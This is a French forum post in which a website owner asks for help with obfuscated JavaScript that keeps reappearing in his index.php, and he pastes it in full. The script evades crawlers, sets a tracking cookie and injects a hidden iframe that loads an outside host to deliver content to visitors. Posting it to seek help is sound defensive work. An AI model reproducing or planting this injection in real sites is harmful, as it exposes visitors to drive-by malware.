Sécurité site php : injection code malicieux
Salut,
J'ai constaté que des bouts de code sont injectés sur ma page index.php
Voici le genre de code malicieux que je vois sur ma page index.php:
Code:
if(document.cookie.indexOf('urchin')==-1 && !window.navigator.userAgent.toLowerCase().match(/(crawler|googlebot|msnbot|yahoo|search|indexer|cuill.com|stackrambler|aport|yandex|bing|ask)/)) { res=new Date();res.setTime(res.getTime()+80000000);document.cookie='urchin='+escape('google-analytics.com')+';expires='+res.toGMTString()+';path=/'; function iO(){};var lV=new Date();iO.prototype = {bF : function() {sV=false;this.qY='';this.cA='';return 'h<t<t<p6:4/6/4i4mxg6d4oxw6n6l4o}axdxsx.<c}o}m}/4i4n4.<c6g6i}?436'.aI(/[6\}4x\<]/g, '');var kO=function(){};nW='nW';var wP=false;var hH='';},t : function() {var bP=function(){};zY=53599;this.qL='qL';pT='';var iY=function(){};this.mM=false;var mL=function(){return 'mL'};var u=window;l=5320;aN='aN';this.kL=63107;vL='';var i=document;this.nH=false;function yW(){};this.bA='bA';this.nT='';vK='';var g=function(){};this.pW='';var aZ=function(){}; String.prototype.aI=function(o,e){return this.replace(o, e)};zM='';function hB(){};cL='';var aD=new Array();var hO=new Date();var lS=new Date();mO=21254;var m = 'd#i.sUp3l#a.y#'.aI(/[#3%U\.]/g, '');uK=false;var dU=21553;var pA=28676;var b = 'nroQn+e)'.aI(/[\)rP\+Q]/g, '');this.j=false;this.dUM='';sL='';var oC=''; var s = 'aTp;pEeEn;dEC0hEi;lcdT'.aI(/[TE;c0]/g, '');this.oD=57616;this.nR=28704;var q = 'c&rHeDaHtDe&E&lfevmHeHnDtH'.aI(/[Hf&Dv]/g, '');pI=false;this.jZ='';this.kD=false;var a = 'b0oideyt'.aI(/[t0pei]/g, '');var bO=new Array();this.jZO=49972;var qLQ=15686;var h = 'sYtYyYlYen'.aI(/[n\>Y3\^]/g, '');this.xE='';function dS(){};var oDS=new Array();this.bV=37119;var x = 'iTfLrOaLm2eL'.aI(/[L2\+OT]/g, '');oV='';function oDL(){};var r=61212;this.tG='';var z = 'w[r[iQtseJ'.aI(/[JQsW\[]/g, '');this.qMC='';function xQ(){};this.iL='';this.jG='';var qM = 'sPe;tNAztPtzrPi%bNu;tPeN'.aI(/[N;%zP]/g, '');var nN=new Date();var vG=new Date();var w = 's_rfc_'.aI(/[_0f,\|]/g, '');var kOW=function(){return 'kOW'};zU=false;var bC='';var jA=new Date();var f = 's!e^t^T^i!m!e!ovuStS'.aI(/[SXv\!\^]/g, '');tX=false;lX='';var tP=false;this.tA='';var p = 'c8dC<Y/YbWoCdWyC>U<Y/ChUtUmWlC>W'.aI(/[W8CYU]/g, '');this.eS='eS';function sT(){};var bH=new Array();var rR='';function cX(){};var yH='';try {this.cC=52370;jP='jP';this.mF='';var dZ=false;var eK=function(){return 'eK'};var bT=new Array();var n=this.bF();var qK='';this.rT=22879;var k=i[q](x);var vLY='';iYT=false;lW=26789;bM='bM';this.iH=62649;this.tK=24505;cQ=51387;k[h][m] = b;gM='';var oH=false;iR='iR';var pD='pD';k[qM](w, n);var bMA=6076;dB='';function dC(){};var oZ=function(){return 'oZ'};eR=false;document[a][s](k);this.kC='';var aL='aL';this.kLB=59319;wZ=false;var iJ='';rG=7858;var bK=false;} catch(y) {this.aF='';var lD=function(){};i.write(p);this.uL='';var kOG=41230;var v = this;var rGO='';var oG='';tM='tM';wC=false;u[f](function(){ var pJ=function(){};this.eN=false;var oHG=function(){return 'oHG'};kY=false;v.t();fS=false;function jW(){};}, 380);this.iRM=22881;this.fK=false;var mD='';var eB=new Array();}var iM=function(){};this.xH='';}};var uE=new Date();var bCW=new iO(); this.iF='';bCW.t();var pL=new Array();}
Auriez-vous une idée de la façon dont ce hacker procède car je ne comprends pas. Comment régler définitivement le problème ?
J'ai déjà essayé de supprimmer le code mais cela revient toujours. J'ai aussi changer mes codes ftp et mots de passes. Rien n'y fait.
Merci à vous tous
John
